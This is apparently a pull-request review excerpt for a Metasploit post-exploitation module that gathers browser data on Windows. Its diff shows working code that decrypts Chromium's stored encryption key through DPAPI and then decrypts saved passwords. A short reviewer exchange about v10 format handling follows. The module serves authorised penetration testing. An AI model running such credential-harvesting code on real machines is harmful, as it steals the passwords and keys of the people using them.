modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,896 @@
+      end
+
+      pdatain = [encrypted_data.length, mem].pack(inout_fmt)
+      ret = session.railgun.crypt32.CryptUnprotectData(
+        pdatain, nil, nil, nil, nil, 0, 2048
+      )
+      len, addr = ret['pDataOut'].unpack(inout_fmt)
+      decrypted_data = len == 0 ? nil : session.railgun.memread(addr, len)
+
+      session.railgun.kernel32.LocalFree(mem)
+      session.railgun.kernel32.LocalFree(addr) if addr != 0
+      print_good('Decryption successful.') if datastore['VERBOSE']
+      return decrypted_data.strip
+    rescue StandardError => e
+      print_error("Error during DPAPI decryption: #{e.message}") if datastore['VERBOSE']
+      return nil
+    end
+  end
+
+  def get_chromium_encryption_key(local_state_path)
+    print_status("Getting encryption key from: #{local_state_path}") if datastore['VERBOSE']
+    if file?(local_state_path)
+      local_state = read_file(local_state_path)
+      json_state = begin
+        JSON.parse(local_state)
+      rescue StandardError
+        nil
+      end
+      if json_state.nil?
+        print_error('Failed to parse JSON from Local State file.')
+        return nil
+      end
+
+      if json_state['os_crypt'] && json_state['os_crypt']['encrypted_key']
+        encrypted_key = json_state['os_crypt']['encrypted_key']
+        encrypted_key_bin = begin
+          Rex::Text.decode_base64(encrypted_key)[5..]
+        rescue StandardError
+          nil
+        end
+        if encrypted_key_bin.nil?
+          print_error('Failed to Base64 decode the encrypted key.')
+          return nil
+        end
+
+        print_status("Encrypted key (Base64-decoded, hex): #{encrypted_key_bin.unpack('H*').first}") if datastore['VERBOSE']
+        decrypted_key = decrypt_chromium_data(encrypted_key_bin)
+
+        if decrypted_key.nil? || decrypted_key.length != 32
+          print_error("Decrypted key is not 32 bytes: #{decrypted_key.nil? ? 'nil' : decrypted_key.length} bytes") if datastore['VERBOSE']
+          if decrypted_key.length == 31
+            print_status('Decrypted key is 31 bytes, attempting to pad key for decryption.') if datastore['VERBOSE']
+            decrypted_key += "\x00"
+          else
+            return nil
+          end
+        end
+        print_good("Decrypted key (hex): #{decrypted_key.unpack('H*').first}") if datastore['VERBOSE']
+        return decrypted_key
+      else
+        print_error('os_crypt or encrypted_key not found in Local State.')
+        return nil
+      end
+    else
+      print_error("Local State file not found at: #{local_state_path}")
+      return nil
+    end
+  end
+
+  def decrypt_chromium_password(encrypted_password, key)
+    @app_bound_encryption_detected ||= false
+    @password_decryption_failed ||= false
+
+    # Check for the "v20" prefix that indicates App-Bound encryption, which can't be decrypted yet.
+    # https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
+    if encrypted_password[0, 3] == 'v20'
```

Comment:
Just cross-referencing with the existing module, do we need to do anything special for pre-v10 or v10? 

https://github.com/rapid7/metasploit-framework/blob/e899f1681f006a3bf488269e120703c1f2e56719/modules/post/windows/gather/enum_chrome.rb#L192

No worries if it's already handled in this PR, just asking before getting access to older installs to check :+1:

Reply:
v10 is handled as default and not explicitly checked. :)